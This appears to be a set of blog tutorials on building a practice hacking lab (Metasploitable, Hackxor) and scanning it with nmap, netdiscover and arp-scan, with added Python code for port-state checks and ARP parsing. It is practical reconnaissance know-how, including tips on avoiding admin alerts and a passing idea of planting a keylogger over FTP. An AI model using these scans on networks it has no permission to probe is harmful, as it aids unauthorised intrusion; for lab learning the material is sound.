<a href="https://4.bp.blogspot.com/-CzWdod7A1SA/V-uccrSKGGI/AAAAAAAACnQ/2xSHLdILojI6Goar5910INtFIQHIJUkQQCEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://4.bp.blogspot.com/-CzWdod7A1SA/V-uccrSKGGI/AAAAAAAACnQ/2xSHLdILojI6Goar5910INtFIQHIJUkQQCEw/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Switch to your attacker machine. Let's start a <a href="https://nmap.org/book/man-port-scanning-techniques.html" target="_blank">host discovery scan</a> to find out Metasploitable's IP address.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Ping Sweep to discover Live Hosts</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter command: nmap -sP -PI <<your network address/24>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-WsujCO5Y0O8/V-uccws1HYI/AAAAAAAACnU/UaKOag0EizYGJezwG-xidHz4jQTq9A5CQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://3.bp.blogspot.com/-WsujCO5Y0O8/V-uccws1HYI/AAAAAAAACnU/UaKOag0EizYGJezwG-xidHz4jQTq9A5CQCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">4 hosts show up in the result. Let's analyze this: it can't
be the addresses ending in “.1” or “.254”, and it can't be “.133” either, because that's
your attacker machine. That leaves the host ending in “.128”, and since we know there is no other
machine running, it must be the Metasploitable machine. Your IP addresses
may vary, but the logic still applies. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">So we now know where our target is. Let's look for the open
ports, the services, and the operating system running on our target. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Open Ports, Services and OS discovery</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter command: nmap -sV -O -p 0-65535 <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-p” flag tells nmap to scan all 65535
ports on the target. Remember that a default scan only covers 1000 ports. A full
port scan makes more noise than a default scan because it attempts to establish
connections to many more ports. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Qx9HONXyzHg/V-ucc4CQ62I/AAAAAAAACnY/EdPH8KVIDFctVsTLsHvaykWxXJ2fg73zgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="https://3.bp.blogspot.com/-Qx9HONXyzHg/V-ucc4CQ62I/AAAAAAAACnY/EdPH8KVIDFctVsTLsHvaykWxXJ2fg73zgCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now we can see all open ports, what services are running on
them, their versions and the operating system. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Carefully look at the services that are open. For example, FTP is
open. <a href="https://flow.microsoft.com/en-us/services/shared_ftp/ftp/" target="_blank">FTP</a> (File Transfer Protocol) is used to send and receive files over a network. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We could potentially use this protocol and maybe retrieve some
local files from that host, or send in a <a href="https://blogs.mcafee.com/consumer/what-is-a-keylogger/" target="_blank">keylogger</a> to record the user's keyboard activity to gather passwords and other information. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Questions to ask yourself:</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">1. Can I interact with the FTP service on port 21?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">2. Can I access the service using any default credentials?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">3. What version is the service? Is it the latest?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">4. Can I Google any known exploits for that service version?</span><o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Activate your Google searching skills and try to answer these questions
by yourself first. In our next tutorial we will dig deeper into the FTP service. </span><o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-1677492847045059982016-09-28T02:25:00.003-07:002016-10-12T03:05:26.236-07:00Adding More Machines to Your Virtual Hack Lab<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are intentionally vulnerable virtual machines that
security professionals use to practice penetration testing, conduct
security trainings and test out tools and exploits. These virtual machines are
best for honing your skills, as the most basic vulnerabilities are there for
you to discover and exploit, giving you confidence and experience at finding
them. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Metasploitable 2</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Metasploitable is an Ubuntu Linux virtual machine. This is
number 1 on my list because it allows you to learn from the basics to advanced topics in
both infrastructure penetration testing and web penetration testing, with
Mutillidae and DVWA pre-installed.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You can find the VM <a href="https://sourceforge.net/projects/metasploitable/" target="_blank">here</a>. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">A good thing about Metasploitable is that it uses very few
of your computer's resources (512MB of RAM and 8GB of HDD), leaving
you more room for other VMs running at the same time. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Go ahead, download the VM and get it ready to run. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Note that, by default, there are 2 network adapters
installed on the VM. Remove the 2<sup>nd</sup> network adapter and change the
first one from NAT to VMNet1 (Host Only) so that it is on the same network as your
attacker machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Hackxor</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This is designed as a game where you have to gain root
access to the system by progressing through the game's story. It is focused on
web application hacking.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You can find the VM </span><a href="https://sourceforge.net/projects/hackxor/files/hackxor1.7z/download" style="font-family: "Trebuchet MS", sans-serif;" target="_blank">here</a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are hundreds of other vulnerable VMs available out there which have not been mentioned here, because all you need to get started is Metasploitable and Hackxor. After mastering these two, you will have enough experience to go on and pwn machines solo :) </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-87554319746755807862016-09-27T05:49:00.000-07:002016-10-12T02:56:36.288-07:00Simple Guide to Network Scanning with Nmap<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://nmap.org/" target="_blank">Nmap</a> is a popular <a href="https://opensource.com/resources/what-open-source" target="_blank">open source</a>
network exploration tool. It has a ton of features that are very useful to
anyone trying to scan, enumerate and look for vulnerabilities on a host or
network. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Starting with the very basics;
when scanning you are usually looking for the ports that are open on the live
hosts and the services that are running on them. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are 6 states a port can be in,
but we will look only at the 2 main states: open and closed.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Open port: This means that an
application is listening for connections on this port. This is good, as it
tells you that you can interact with it. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Closed port: This means that there
is no application listening on this port. And you cannot talk to a closed port.
<o:p></o:p></span></div>
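<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">To make the open/closed distinction concrete, here is an added example (not from the original post, and not Nmap's own code) that classifies a TCP port by attempting a full connection, giving the same verdict the screenshots show. It goes slightly beyond the two states above by also reporting “filtered” for probes that get no answer, and it demonstrates itself on loopback so it runs offline.</span></div>

```python
"""Added example: classify TCP ports as open / closed / filtered from the
client side using a plain connect, and demonstrate the verdicts on loopback.
This is illustrative code, not Nmap's implementation."""
import socket
from typing import Dict, Iterable, Tuple

OPEN, CLOSED, FILTERED = "open", "closed", "filtered"


def port_state(host: str, port: int, timeout: float = 1.0) -> str:
    """Classify one TCP port by what a full three-way handshake reveals.

    open     - the handshake completes: an application is listening, and
               you can interact with it.
    closed   - the host answers with a RST (connection refused): the host
               is reachable, but nothing listens there, so there is nothing
               to talk to.
    filtered - no answer before the timeout (or the network is unreachable):
               most likely a firewall is dropping the probe.

    Because this completes the handshake, the connection also shows up in
    the target service's own logs, unlike a half-open SYN scan.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return OPEN
    except ConnectionRefusedError:
        return CLOSED
    except OSError:  # covers socket.timeout / TimeoutError and unreachable
        return FILTERED


def scan_ports(host: str, ports: Iterable[int]) -> Dict[int, str]:
    """Probe each port in turn and map port number to its state."""
    return {p: port_state(host, p) for p in ports}


def summarize(results: Dict[int, str]) -> Dict[str, int]:
    """Count how many ports landed in each state."""
    counts = {OPEN: 0, CLOSED: 0, FILTERED: 0}
    for state in results.values():
        counts[state] += 1
    return counts


def demo_open_then_closed() -> Tuple[str, str]:
    """Self-contained demonstration on loopback: bind a listener on an
    ephemeral port, probe it (expect 'open'), close the listener, probe the
    same port again (expect 'closed', since the kernel now answers RST)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    try:
        while_open = port_state("127.0.0.1", port)
    finally:
        listener.close()
    after_close = port_state("127.0.0.1", port)
    return while_open, after_close


if __name__ == "__main__":
    print(demo_open_then_closed())  # ('open', 'closed')
```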
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Let’s start looking at open ports
on our victim machines.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">From previous articles you learnt
about an ICMP ping sweep <a href="https://nmap.org/book/man-port-scanning-techniques.html" target="_blank">scan with Nmap</a>. Here we look at a TCP SYN ping scan.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">TCP SYN Ping Scan</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Input the command: nmap -PS <<target
IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-PS” flag
tells nmap to send a SYN packet to the target and listen for a response. This
command comes in handy when your target system is configured to block ICMP
ping sweeps. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-XCOfA17TXI4/V-ppkRxWdXI/AAAAAAAACnA/dAuvOD73L5wcLbKS787R6wYkBfvCSSEcQCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://1.bp.blogspot.com/-XCOfA17TXI4/V-ppkRxWdXI/AAAAAAAACnA/dAuvOD73L5wcLbKS787R6wYkBfvCSSEcQCLcB/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Stealth Scan</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Input the command: nmap -sS <<target
IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-sS” flag
tells nmap to initiate a three-way handshake with the target but not
complete the handshake. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-URpv0fNTeck/V-ppkboCBjI/AAAAAAAACm8/RCsSWeweW64EO62ZbeSCee6YKtebzb5-gCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://4.bp.blogspot.com/-URpv0fNTeck/V-ppkboCBjI/AAAAAAAACm8/RCsSWeweW64EO62ZbeSCee6YKtebzb5-gCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This was useful in the past, when
firewalls did not log incomplete handshakes with the computer's ports.
However, with the latest firewalls even an incomplete handshake is logged, and
so it is not so stealthy anymore. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Full Nmap Scan</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Input the command: nmap -sV -O <<target
IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">With this command nmap scans the
first 1000 ports on the target, with the “-sV” flag to find out the version of
the services running on the open ports and with the “-O” flag to find out the
operating system running on the target. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Look through the results and see if
you can locate the OS details and the version numbers of any services
discovered. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now you must be wondering why use all these different flags when you can just run a full scan and get the same results? The answer is noise. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Running a full scan over the network makes too much noise; the network admins can get alerted and can even blacklist your attacker machine. So we resort to running specific scans to find out specific bits of information while making less noise. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i><br /></i></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><i><br /></i></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
<h2>Scanning Network using Netdiscover, ARP-Scan & ARP to Find Live Hosts</h2>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>Jayesh, 2016-09-26 (updated 2016-10-12)</i></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">ICMP ping sweep is one way to discover live hosts in a
network. It may sometimes be blocked on the network. You then resort to using
an ARP scan to discover live hosts. Like ICMP, ARP can also be blocked on the
network. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">ARP scans have an advantage of finding hidden devices on the network. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://technet.microsoft.com/en-us/library/cc940021.aspx" target="_blank"><br /></a></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://technet.microsoft.com/en-us/library/cc940021.aspx" target="_blank">The Address Resolution Protocol (ARP)</a> is a protocol that
maps <a href="https://en.wikipedia.org/wiki/MAC_address" target="_blank">MAC addresses</a> on the network with IP Addresses and keeps it on a list for
reference. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">How does it work?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">ARP requests are broadcasted to all the MAC addresses on the
network to request them to respond with their assigned IP addresses. Each
received IP address means a live host. <o:p></o:p></span></div>
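<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">To make that exchange concrete, here is an added example that is not code from the article, netdiscover or arp-scan: it builds and decodes Ethernet/ARP frames in memory with Python's struct module and then collects the sender fields of the replies the way an ARP scanner does. No packets are sent; the addresses are constructed from the RFC 5737 test range with locally administered MAC addresses.</span></div>

```python
"""Decode ARP request/reply frames the way an ARP scanner interprets them.

Added example; not the article's, netdiscover's or arp-scan's code. The
frames below are constructed in memory (nothing is sent), with RFC 5737 test
addresses and locally administered MAC addresses.
"""
import ipaddress
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = b"\xff" * 6

# Ethernet header: dst(6) src(6) type(2); ARP body for IPv4 over Ethernet:
# htype(2) ptype(2) hlen(1) plen(1) oper(2) sha(6) spa(4) tha(6) tpa(4)
ETH_HDR = struct.Struct("!6s6sH")
ARP_BODY = struct.Struct("!HHBBH6s4s6s4s")


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(oper, sha, spa, tha, tpa):
    """Build an Ethernet frame carrying one ARP message.

    A request goes to the broadcast MAC (nobody knows the answer yet); a
    reply goes straight back to the asker's MAC.
    """
    eth_dst = BROADCAST_MAC if oper == ARP_REQUEST else mac_bytes(tha)
    body = ARP_BODY.pack(1, 0x0800, 6, 4, oper,
                         mac_bytes(sha), ipaddress.IPv4Address(spa).packed,
                         mac_bytes(tha), ipaddress.IPv4Address(tpa).packed)
    return ETH_HDR.pack(eth_dst, mac_bytes(sha), ETHERTYPE_ARP) + body


def parse_arp(frame):
    """Return a dict describing the ARP message, or None if the frame is not ARP."""
    if len(frame) < ETH_HDR.size + ARP_BODY.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = ARP_BODY.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None  # only IPv4-over-Ethernet ARP is handled here
    return {"oper": oper,
            "sender_mac": mac_text(sha), "sender_ip": str(ipaddress.IPv4Address(spa)),
            "target_mac": mac_text(tha), "target_ip": str(ipaddress.IPv4Address(tpa))}


def live_hosts(frames, subnet):
    """Map IP -> MAC for every ARP reply whose sender sits inside `subnet`.

    This is the bookkeeping an ARP scanner does: one request per address in
    the range, then each reply's sender fields mark a live host.
    """
    net = ipaddress.ip_network(subnet)
    found = {}
    for f in frames:
        msg = parse_arp(f)
        if msg and msg["oper"] == ARP_REPLY and ipaddress.ip_address(msg["sender_ip"]) in net:
            found[msg["sender_ip"]] = msg["sender_mac"]
    return found


# Constructed exchange: the scanner at .133 asks about .1 and .10; only .10 answers.
SCANNER_MAC, SCANNER_IP = "02:00:00:00:00:85", "192.0.2.133"
REQUESTS = [build_arp(ARP_REQUEST, SCANNER_MAC, SCANNER_IP, "00:00:00:00:00:00", ip)
            for ip in ("192.0.2.1", "192.0.2.10")]
REPLIES = [build_arp(ARP_REPLY, "02:00:00:00:00:0a", "192.0.2.10", SCANNER_MAC, SCANNER_IP)]

if __name__ == "__main__":
    for f in REQUESTS + REPLIES:
        print(parse_arp(f))
    print(live_hosts(REQUESTS + REPLIES, "192.0.2.0/24"))
```

<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Because the request carries the asker's own IP and MAC in its sender fields, every host that receives the broadcast learns them too, which is why an ARP scan is easy to spot on the wire: a single station asking about every address in the subnet, one after another.</span></div>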
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">ARP Scan using <a href="https://github.com/alexxy/netdiscover" target="_blank">Netdiscover</a></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Open up your attacker machine terminal and type in the
following command: netdiscover -r 192.168.221.0/24<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Make sure you change the IP range/subnet to yours. This
command with the “-r” flag tells netdiscover to send out ARP requests to the
given subnet. All responds will be displayed on the screen.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-sLdiAHAHgYA/V-jsaQU5m_I/AAAAAAAACmU/ub7HyRYHyw89ypRGLzQ6QjwYPt-XdDggQCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://2.bp.blogspot.com/-sLdiAHAHgYA/V-jsaQU5m_I/AAAAAAAACmU/ub7HyRYHyw89ypRGLzQ6QjwYPt-XdDggQCLcB/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">As you can see it has found 4 hosts.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">ARP Scan using
<a href="https://github.com/royhills/arp-scan" target="_blank">arp-scan</a></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Type the following command on your terminal: arp-scan --interface=eth0
192.168.221.0/24<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command tells arp-scan to scan on the eth0 interface
with which you are connected to the network and scan the given subnet. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-_c4tj7SyeH8/V-jsaeCXAjI/AAAAAAAACmQ/qayUddBGOqQoYrlZfN4Q51xqt04tL_AKACEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://4.bp.blogspot.com/-_c4tj7SyeH8/V-jsaeCXAjI/AAAAAAAACmQ/qayUddBGOqQoYrlZfN4Q51xqt04tL_AKACEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The results match Netdiscover, as they both used the same
fundamental network scanning tactic. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
<div class="MsoNormal">
<o:p></o:p></div>
<h2>Scanning Network using Fping, Nmap & ICMP to Find Live Hosts</h2>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>Jayesh, 2016-09-26 (updated 2016-10-12)</i></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">It goes without saying that you need to first know your
target before you can attack one. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Knowing your target is one of the most important things a
security professional has to do. You should spend a good amount of time here. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Basic objectives of network scanning:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
</div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Discover live hosts (IP address) and their OS</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Discover open ports on live hosts</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Discover services running on open ports</span></li>
</ul>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
